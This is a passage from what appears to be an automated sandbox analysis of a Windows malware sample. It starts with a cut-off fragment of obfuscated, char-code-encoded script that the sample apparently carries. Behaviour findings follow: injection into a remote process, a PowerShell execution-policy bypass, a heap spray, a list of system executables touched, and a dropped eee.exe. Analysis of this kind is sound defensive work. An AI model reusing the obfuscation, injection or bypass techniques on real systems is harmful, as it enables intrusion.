@(4718,4730,4730,4726,4729,4672,4661,4661,4736,4735,4726,4668,4712,4715,4665,4733,4735,4713,4662,4663,4660,4725,4724,4715,4659,4713,4722,4719,4713,4721,4728,4660,4719,4713,4731,4661,4715,4715,4715,4660,4715,4734,4715));zJf $mUBIuDwhhjWEPp $HgTkSNV;TPk $mUBIuDwhhjWEPp;};;}bID;
Process injection Process 2612 resumed a thread in remote process 2700
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000000000036c
suspend_count: 1
process_identifier: 2700
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
count 11210 name heapspray process powershell.exe total_mb 700 length 65536 protection PAGE_READWRITE
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Roaming\eee.exe